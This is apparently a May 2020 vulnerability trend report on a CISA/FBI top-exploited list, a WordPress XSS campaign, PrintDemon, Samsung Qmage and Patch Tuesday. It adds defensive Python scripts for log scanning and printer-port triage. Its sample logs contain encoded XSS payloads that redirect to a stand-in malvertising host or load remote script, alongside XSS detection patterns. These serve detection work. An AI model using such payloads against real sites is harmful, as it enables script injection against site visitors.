This report provides a regular overview of trends in vulnerability disclosures and announcements. Where applicable, it notes known exploits for trending vulnerabilities and the relevant courses of action. The report is not exhaustive and will not cover every vulnerability announced in the month.
Key Findings
- The Department of Homeland Security (DHS), Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly published a list of the top 10 vulnerabilities most routinely exploited in recent years.
- Microsoft addressed 111 vulnerabilities as part of the May 2020 Patch Tuesday advisory.
- An unknown threat actor targeted vulnerabilities in over 900,000 WordPress websites in the first week of May 2020.
Analysis
FBI Top Vulnerabilities Exploited
In May 2020, the Department of Homeland Security (DHS), Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly published a list of the top 10 vulnerabilities most routinely exploited in recent years.
The ten vulnerabilities listed were exploited routinely throughout 2016-2019, and one of them was published as long ago as 2012. This points to slow patch adoption across most industries: the flaws being exploited at scale are, for the most part, old and long since fixed by the vendor.
Two of the ten flaws, CVE-2017-0199 and CVE-2017-11882, were discussed in the report EclecticIQ Pandemic Intelligence Update April 14 2020 as part of the tool set threat actors use to exploit victims with COVID-19 themed attacks.
- Course of Action: Review report Published by DHS, CISA and FBI
WordPress Mass Exploitation Campaign
In the first week of May 2020, an unknown threat actor targeted over 900,000 WordPress websites in a campaign attempting to exploit several vulnerabilities. The actor targeted Cross-Site Scripting (XSS) flaws as well as other vulnerabilities to compromise the sites, with the end goal of injecting JavaScript that redirects visitors to malvertising sites.
WordPress plugins have been subject to many vulnerabilities, which increases the attack surface of every site that installs them. In this campaign the threat actor targeted the Easy2Map, WP GDPR Compliance and Total Donations plugins as well as the Blog Designer and Newspaper themes. All of these have been patched against the flaws under attack, some in recent months but others much earlier; the Newspaper theme flaw, for example, was addressed as far back as 2016.
This attack speaks to the slow adoption of security updates as well as the wide attack surface: if threat actors are still targeting years-old vulnerabilities, they are still seeing a return on that investment.
Full details of the exploit attempts are not available, but site owners are recommended to keep WordPress core, themes and plugins up to date and to remove any plugin or theme that is no longer maintained, since an abandoned component will never receive a fix.
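The campaign above depends on XSS payloads arriving in request parameters, often percent-encoded more than once to slip past naive filters. The following Python is an added example, not code from the EclecticIQ report or from any WordPress security vendor: it scans web-server access logs, decodes each query parameter fully, and flags requests carrying script or event-handler markers. The log lines are constructed, and the plugin endpoint and parameter names in them are illustrative assumptions, not the endpoints abused in the campaign.

```python
"""Flag web-server requests that carry XSS payloads aimed at a WordPress site.

Added example. The log lines are constructed; the endpoint and parameter
names are illustrative assumptions, not the ones abused in May 2020.
"""
import re
from html import unescape
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Combined Log Format (one benign pair, three attacks).
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2020:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=example_save&redirect=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fmalvertising.example%2F%27%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [04/May/2020:10:01:13 +0000] "GET /?s=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 9381 "-" "Mozilla/5.0"
198.51.100.4 - - [04/May/2020:10:02:01 +0000] "GET /wp-content/themes/example-theme/style.css HTTP/1.1" 200 7120 "https://blog.example/" "Mozilla/5.0"
198.51.100.4 - - [04/May/2020:10:02:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [04/May/2020:10:03:30 +0000] "GET /wp-admin/admin-ajax.php?action=example_save&value=%2522%253E%253Cscript%2520src%253D%252F%252Fcdn.example%252Fa.js%253E HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that only make sense if the parameter is meant to land in a page as HTML/JS.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),            # onerror=, onload=, onmouseover= ...
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"document\.(location|cookie|write)", re.I),
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding and HTML entities; attackers stack both."""
    for _ in range(rounds):
        decoded = unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def xss_indicators(target: str) -> list:
    """Return the names of query parameters whose decoded value carries an XSS marker."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(raw)           # parse_qsl already removed one layer
        if any(p.search(decoded) for p in XSS_PATTERNS):
            hits.append(name)
    return hits


def scan_log(text: str) -> list:
    """Return (client ip, request path, [suspect parameters]) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not Combined Log Format; skip
        params = xss_indicators(m["target"])
        if params:
            findings.append((m["ip"], urlsplit(m["target"]).path, params))
    return findings


if __name__ == "__main__":
    for ip, path, params in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {path} suspicious params: {', '.join(params)}")
```

The double-encoded third attack is the reason `fully_decode` loops: `parse_qsl` strips one layer, and a single `unquote` would leave `%22%3E%3Cscript...` unmatched. The event-handler pattern is deliberately broad and will match a parameter such as `one=`; tune it to the handler names you care about, and whitelist parameters that legitimately carry HTML (post bodies in the editor, for instance) before using this on production logs.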
Newly Discovered Vulnerabilities
CVE-2020-1048 (PrintDemon)
A vulnerability in the Windows Print Spooler service can be used to escalate privileges on Microsoft Windows versions going back as far as Windows NT 4, released in 1996. The flaw, dubbed PrintDemon, lies in the Print Spooler, the Windows component that manages printing operations.
Security researchers Alex Ionescu and Yarden Shafir published a report showing that the spooler's internal port mechanism can be hijacked: a low-privileged user can create a printer port whose name is an arbitrary file path, and the spooler, which runs as SYSTEM, then writes the contents of a print job to that path. Writing attacker-controlled data into a location such as the System32 directory turns this into a local privilege escalation (LPE). The bug is not remotely exploitable on its own; the attacker first needs to run code as a local user on the machine. A Proof-of-Concept (PoC) exploit is available on Alex Ionescu's GitHub.
The PrintDemon vulnerability is tracked as CVE-2020-1048 and was patched as part of Microsoft's May 2020 Patch Tuesday advisory.
- Course of Action: Review May 2020 Microsoft Patch Tuesday Advisory
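Because PrintDemon leaves an artefact behind, a printer port whose name is really a file path, the port list is the natural place to hunt for abuse on hosts that were unpatched for a while. The Python below is an added example, not code from the EclecticIQ report or from Ionescu and Shafir: it classifies port names and flags any that point into the Windows directory or at an executable. The sample port list is constructed (the DLL name in it is a placeholder, not the file used by the published PoC). On Windows the live names can be read with the real `Get-PrinterPort` cmdlet or, as the optional branch here assumes, with pywin32's `win32print.EnumPorts`.

```python
"""Triage printer port names for the PrintDemon (CVE-2020-1048) pattern.

Added example. The indicator hunted for is a port whose name is a file
path under the Windows directory or ending in an executable extension.
SAMPLE_PORTS is constructed; the .dll name is a placeholder.
"""
import re
from typing import List, Tuple

# Constructed sample of what Get-PrinterPort might list on an abused workstation.
SAMPLE_PORTS = [
    "LPT1:", "COM1:", "FILE:", "PORTPROMPT:", "nul:", "SHRFAX:",
    "192.168.10.20", "WSD-3f2a1b7c-0000-1111-2222-333344445555",
    r"\\printsrv\hr-laser",                       # shared printer, benign
    r"C:\Users\Public\printjob.txt",              # file port outside system dir
    r"C:\Windows\System32\payload-example.dll",   # placeholder for a planted DLL
]

# Port names Windows creates itself or that are expected on a normal host.
BENIGN_PORT_RE = re.compile(
    r"^(LPT\d+:|COM\d+:|FILE:|PORTPROMPT:|nul:|SHRFAX:|"   # built-in port monitors
    r"\d{1,3}(\.\d{1,3}){3}(_\d+)?|"                       # Standard TCP/IP ports
    r"WSD-[0-9a-f-]+(\.[0-9a-f]+)?|"                       # Web Services for Devices
    r"Microsoft\.Office\.OneNote_.*|"                       # OneNote app port
    r"\\\\[^\\]+\\[^\\]+)$",                                # \\server\share (two parts)
    re.I,
)
PATH_RE = re.compile(r"^(?:[a-z]:\\|\\\\)", re.I)           # drive letter or UNC path
SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\", re.I)
EXEC_EXT_RE = re.compile(r"\.(dll|exe|sys|ocx|cpl)$", re.I)


def classify_port(name: str) -> Tuple[str, str]:
    """Return (severity, reason) for one port name; severity is ok, review or high."""
    n = name.strip()
    if BENIGN_PORT_RE.match(n):
        return "ok", "known port type"
    if not PATH_RE.match(n):
        return "review", "unrecognised port name"
    if SYSTEM_DIR_RE.match(n) or EXEC_EXT_RE.search(n):
        return "high", "port writes into the Windows directory or to an executable"
    return "review", "port is a file path outside the system directory"


def triage_ports(names: List[str]) -> List[Tuple[str, str, str]]:
    """Classify every port and return only the flagged ones, worst first."""
    order = {"high": 0, "review": 1, "ok": 2}
    rows = [(n, *classify_port(n)) for n in names]
    flagged = [r for r in rows if r[1] != "ok"]
    return sorted(flagged, key=lambda r: order[r[1]])


def local_port_names() -> List[str]:
    """Read the live port list via pywin32 when available, otherwise use the sample."""
    try:
        import win32print  # assumption: pywin32 present only on a Windows host
        return [p["Name"] for p in win32print.EnumPorts(None, 1)]
    except ImportError:
        return SAMPLE_PORTS


if __name__ == "__main__":
    for name, severity, reason in triage_ports(local_port_names()):
        print(f"[{severity:6}] {name}: {reason}")
```

A UNC name with exactly two components is treated as a shared printer, while `\\server\share\file.dll` has three and is classified as a path, so a port pointing at a file on a share is still caught. Hostname-style TCP/IP ports will land in `review`; extend `BENIGN_PORT_RE` with your print servers before running this across a fleet.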
CVE-2020-8899 (Samsung Qmage)
Google security researchers discovered a vulnerability that impacts all Samsung smartphones sold since 2014. The flaw resides in how Samsung's Android builds handle the custom Qmage image format (.qmg). Mateusz Jurczyk of Google's Project Zero bug-hunting team found a way to exploit how Skia, the Android graphics library, decodes Qmage images sent to a device.
The flaw is described as a 0-click vulnerability, meaning that no user interaction is required for exploitation to succeed. The researcher demonstrated a PoC exploit that achieved successful exploitation by sending repeated MMS (multimedia SMS) messages to a Samsung device; incoming MMS content is parsed automatically on receipt, so the victim never has to open a message.
The vulnerability, tracked as CVE-2020-8899, was discovered in February 2020 and reported to Samsung. The fix shipped in Samsung's May 2020 security maintenance release, which also carries the patches from the May 2020 Android Security Bulletin. Because the PoC's delivery channel is MMS, disabling automatic MMS retrieval in the messaging app reduces the zero-click exposure of devices that have not yet received the update, although any app that decodes a Qmage image through Skia remains a possible vector.
- Course of Action: Apply the Samsung May 2020 security update (Android Security Bulletin - May 2020 patch level)
Patched Vulnerabilities
Microsoft Patch Tuesday May 2020
Microsoft addressed 111 vulnerabilities as part of the May 2020 Patch Tuesday advisory. The advisory spans 12 different products, including Microsoft Edge, Windows, Visual Studio and the .NET Framework.
Significantly, none of the vulnerabilities in this edition of the advisory were reported as publicly disclosed or exploited in the wild before release; it contains no 0-days.
Some of the more notable and severe vulnerabilities in the advisory include:
- CVE-2020-1023 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1024 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1102 - Microsoft SharePoint Remote Code Execution Vulnerability
- CVE-2020-1096 - Microsoft Edge PDF Remote Code Execution Vulnerability
- CVE-2020-1051 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1174 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1175 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1176 - Jet Database Engine Remote Code Execution Vulnerability
- CVE-2020-1067 - Windows OS Remote Code Execution Vulnerability
- CVE-2020-1064 - MSHTML Engine Remote Code Execution Vulnerability
- Course of Action: Review May 2020 Microsoft Patch Tuesday Advisory
Recommendations
Users should ensure they update all affected and dependent systems, even those not mentioned in this report, and prioritise the vulnerabilities above that have public exploit code or are under active exploitation.